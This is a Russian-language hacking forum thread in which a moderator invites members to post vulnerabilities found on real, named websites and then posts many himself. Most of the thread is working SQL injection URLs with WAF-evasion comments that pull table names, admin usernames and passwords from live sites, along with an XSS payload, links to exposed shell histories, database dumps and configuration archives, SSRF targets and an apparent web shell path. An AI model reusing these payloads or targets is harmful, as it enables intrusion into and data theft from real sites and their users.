Дата: 24/08/17 - 01:57 am   9453 Тем и 93417 Сообщений

Автор Тема: Ваши найденные уязвимости  (Прочитано 33769 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Июня 13, 2017, 03:30:29 am
Прочитано 33769 раз

BаbaDook

  • Moderator

  • Онлайн
  • *****

  • 39
    02.03.17
  • Reputation:
    15
    • Просмотр профиля
Предлагаю в этой  теме  выкладывать вами найденные уязвимости.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. для этого достаточно в google сделать запрос : site:damagelab.in  ваш_уязвимый_сайт   
                ВАЖНО:
 1)  Пост должен содержать  уникальный сайт(нигде ране не опубликован с подобной уязвимостью)
 2)  Пост может  сопровождаться  вашими комментариями  и  куском  кода  при необходимости
 3)  Пост  должен содержать результат  эксплуатации уязвимости.  Для  sql  достаточно   будет  получить   версию, пользователя или название базы.  xss aler(); 
  4)  Если по тем или иным причинам выложить сайт не возможно, или  уязвимость носит другой  характер, ошибка   конфигурации или  бинарная  , тогда   принимаются  скрины   плюс описание  уязвимости, метода её эксплуатаци и результат.

                       
 Пример :

SQL inj
http://www.styleme.co.in/index.php?action=reviewdetail&id=26  union select GROUP_CONCAT(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

Бекап

Цитировать
https://vobjem.ru/dump.sql

   
В теме запрещены  посты  не  по теме.
Старайтесь выкладывать уязвимость с кодом - это будет вам большой плюс.


« Последнее редактирование: Июня 13, 2017, 04:13:15 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июня 13, 2017, 05:31:28 pm
Ответ #1

BаbaDook

  • Moderator

  • Онлайн
  • *****

  • 39
    02.03.17
  • Reputation:
    15
    • Просмотр профиля
https://www.anti-malware.ru/.bash_history
https://www.anti-malware.ru/phpinfo.php
А казалось бы  серьёзный ресурс, около ибэ

http://доу233ржд.рф/www.zip
Качаем, открываем файл config и смотрим данные


http://www.bikesbikesbikesuk.com/list.php?catid=1+UnIon+select+111111111,(select  group_concat(0x3c62723e,table_name)+from+information_schema.tables   where table_schema=database()),3333333333333333,44444444444444444,5555555555555555,66666666666666,77777777777777,8888888888888888,999999999999+--+-

https://www.pecpodsnezkou.cz/hasici/akce-detail.php?id=1363516980+UnIon+seLect+1,2,3,GroUp_concat(0x3c62723e,TaBle_name,0x20,column_name ),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_schema=database()

http://www.quicktrade.co.in/category_list.php?id=32+/*!50000UnIoN*/+SeLecT+1,2,3,/*!12345CoNcat*/(0x3c68313e,TabLe_name),5,6,7,8,9,10,11,12,13,14+from+/*!12345information_schema.tables*/+--+-

http://www.lambbuilding.co.uk/practice/arealist.php?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345database*/())))--

http://www.lambbuilding.co.uk/practice/arealist.php
?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!50000concat*/(/*!12345table_name*/)+/*!13337from*/+/*!50000information_schema.tables*/  limit 66,1)))--

http://unisunbd.com/page.php?cid=1&page=-522'+/*!13337UNiOn*/+seLect+1,table_name,3,4,5+from+/*!13337information_schema.tables*/limit  20,1+--+-
http://www.larrysparks.com/gallery.php?id=1'+/*!50000UnIoN*/+SeLect+user(),2,3,4+--+-
http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm
?storeid=3+ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--


http://my-files.ru/qxqv6p
Дамп  нескольких сайтов
 
ssrf
http://www.1-hit.com/sniffer.htm


ssrf
http://testuri.org/sniffer



SSRF
http://www.getacert.com


getacert.com Ещё  тут рце нашёл  или command injection 

SSRF
http://web-sniffer.me

Вот  сила  данной  атаки, попробуйте Nmap -p 25  web-sniffer.me
« Последнее редактирование: Июня 29, 2017, 03:20:50 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июля 08, 2017, 03:13:27 am
Ответ #2

BаbaDook

  • Moderator

  • Онлайн
  • *****

  • 39
    02.03.17
  • Reputation:
    15
    • Просмотр профиля
Легенькая  sql+waf
http://www.bpc.gov.bd/contactus.php?id=-13'+/*!50000UniOn*/+SeLecT+1,2,/*!12345GrOuP_CoNCaT(TaBle_NaMe,0x2020,CoLuMn_NaMe)*/,4,5,6,7+FrOM+/*!50000InFoRmaTioN_SchEMa*/.CoLuMnS/*!50000+WhEre*/ TaBle_SchEma=DaTabAsE()+--+-
https://www.micro-mechanics.com/about.php?id=-3+/*!50000UnIOn*/+SeLecT+1,2,/*!12345GroUp_CoNcaT%28username,0x3c62723e,password%20%29*/,4,5,6,7,8,9,10,11%20FroM%20admin
http://eco3d.co.uk/library/browse.php?catid=-1372+UnIoN+SeLEcT+1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7
http://reelmen.com/shop-browse.php?catId=3') UNION ALL SELECT GrOuP_CONCAT(0x3c62723e,0x223e3c62723e,TaBle_NaMe,0x2020,CoLuMn_NaMe),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FrOM+InFoRmaTioN_SchEMa.CoLuMnS+WhEre TaBle_SchEma=DaTabAsE()--+-

sql+waf
http://www.tacc.co.il/story.php?id=-9  /*!12345UnIoN+*//*!13337SeLEcT+*/1,2,3,4,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a),6,7,8


XSS
http://easygirls.org/bad.php?texid=><script>alert(123);</script></


SQL
http://www.xenon-rus.ru/search/?searchstring=1"+" and extractvalue(0x0a,concat(0x0a,(select database())))+--+-
Крутим,смотрим, читаем , есть всё  что бы  в  1  запрос залить шел, надо найти только одно. Для самостоятельной работы

http://srn.su/wp-content/themes/1.php


Уязвимость в  пакете  обработки видео.
https://www.onlinevideoconverter.com
https://youtu.be/FaVTfkoOqn4
Цитировать
https://convertio.co
https://online-converting.ru/
http://www.konvertor.org/
Результат http://files.danstools.com/file-convert/result/output.mp4?_ga=2.130601295.1333876469.1501975828-741135336.1501975828
https://cloudconvert.com/

SQL
https://www.beautydepot.ru/search.php?search=process&title=&for=&cat=&subcategory=&family=&nota1=&nota2=%27+and%20extractvalue(0x0a,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()+limit%2018,1)))+--+-&nota3=&price=%27&page=847%27
« Последнее редактирование: Августа 17, 2017, 05:29:08 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Августа 23, 2017, 08:42:28 pm
Ответ #3

BаbaDook

  • Moderator

  • Онлайн
  • *****

  • 39
    02.03.17
  • Reputation:
    15
    • Просмотр профиля
SSRF, XSS and race condition

www.tutorialspoint.com/online_xml_editor.htm
уязвимости в форме загрузки файла

<?php 
  $type = isset($_GET['type'])?$_GET['type']:'';
   if($type != ''){
      $url = $_GET['url'];
      $url = preg_replace('#^https?://#', 'http://', $url);
      $opts = array(
        'http'=>array(
        'method'=>"GET",
        'header'=>"Accept-language: en\r\n" .
                    "Cookie: foo=bar\r\n"
        )
      );
      if(filter_var($url, FILTER_VALIDATE_URL) === false) {
           echo("$url is not a valid URL");
           exit;
      }
      $context = stream_context_create($opts);
      $data = file_get_contents ($url,false,$context);
      if(empty($data)){
         echo -1;
      } else {
         echo $data;   
      }
     
   } else {
      $file = $_FILES['file'];
      $filepath = '/tmp/'. $file['name'];
     $filename = realpath( $filepath );
      if(move_uploaded_file($file['tmp_name'],$filepath ))   
      {
         chmod($filepath, 0777);
         $data = file_get_contents ($filepath);   
         echo $data;
      unlink($filepath);
      }
     
   }
   exit;
?>
НО, к  сожалению из за  особенности  веб сервера   состоянии гонки не  эксплуатируемая
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep